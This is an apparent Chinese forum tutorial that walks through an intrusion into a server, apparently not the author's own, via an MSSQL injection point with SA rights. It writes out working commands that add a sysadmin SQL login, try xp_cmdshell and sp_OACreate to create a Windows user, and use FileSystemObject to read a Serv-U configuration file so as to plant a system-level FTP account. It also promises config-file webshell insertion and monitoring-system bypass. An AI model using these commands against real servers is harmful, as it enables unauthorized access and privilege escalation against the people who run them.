前言:

　　本来这篇文章是年前跟非安全的约稿. 但是不知道什么原因没有发.正好今天整理的时候就找到了.就发到这吧

　　知道邪八的高手如云... 希望别拍我 垃圾文章 赚个原创 高手别拍我..

　　正文:

　　从本文你可以学到:

　　1.MSSQL中一些扩展的应用

　　2.网站配置文件插入一句话

　　3.如何突破一流信息监控系统

　　这期这篇文章呢其实是比较杂乱的，所以我也不知道题目要用什么好，不过相信我，这篇文章看完之后你一定会学到很多新的在渗透过程中思路，OK，跟我来吧!

　　一、SQL server的灵活应用

　　我们知道在渗透过程中思路是最重要的，有时候往往一个细节就决定成败。呵呵，不过理论终究是理论，看过我以前文章的朋友一定知道，我更喜欢以一个事例来讲解一个东西。因为我只是讲一个思路的问题，所以就不会写很多，只写经典的部分，如果大家需要的话以后我会单独写一篇渗透的文章，来详细介绍每一个方法的使用。OK，我们开始吧!

　　话说前几天朋友丢给我一个SA的注射点.但是死活就是不能执行命令。说问我能不能帮忙看看。既然朋友说话了并且据说是非常BT的SA，自己也愿意挑战下。拿到地址后首先telnet一下它的1433。呵呵，这个可能很多朋友就不会注意为什么要先telnet呢? 因为是SA嘛，只要能telnet上去我们就可以在注射点那里执行命令。加一个具有SA权限的sql用户上去，这样在查询分析器里执行命令要比在注射点那里方便的多呢。使用●telnet 61.129.251. x 1433 ●发现可以telnet上去. OK 马上在注射点后面执行:

★ exec master.dbo.sp_addlogin fishing hook; exec master.dbo.sp_addsrvrolemember fishing,sysadmin ★

　　这个命令就是添加一个用户名为fishing密码为hook的SQL用户，权限为SA。两次执行页面都返回成功，说明用户添加成功了。使用SQL server的查询分析器连上，然后执行exec master.dbo.xp_cmdshell 'net user' 发现提示错误：

★ 错误消息 50001，级别 1，状态 50001 xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行） ★

　　很多朋友问过我这个错误信息是什么意思，这里解释一下，其实很简单，那个错误是明明写着 CreateProcess 进程无法创建,而xp_cmdshell 是执行什么进程大家应该知道吧，CMD这个进程无法创建!有可能CMD设置权限拒绝SYSTEM访问，有可能是CMD删除或者改名。以上情况都可以造成CMD进程无法创建的，如图1。

　　看来直接想加用户登陆服务器是不可能了，可能有的朋友会说：不是还有SP_OAcreate 么?但是我在使用SP_OAcreate执行：

★ DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user fish sadfish /add' ★

的时候虽然提示执行成功，但是却发现用户并没有添加进去，初步估计应该是wscript.shell被删掉了。

　　另外如果xp_regwrite 这个存储在的话我们还可以用沙盒模式搞定他的。不过虽然以上三个重要的存储过程都不能用，但是我们还可以用xp_subdirs来列目录。在列到D盘的时候发现了服务器装有serv-u，聪明的朋友们是不是想到了什么?我们可以通过使用FSO在suer-v的●ServUDaemon.ini●里写配置信息 添加一个具有system权限的ftp用户，说做就做，首先使用

★ declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while( @ret = 0 ) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end ★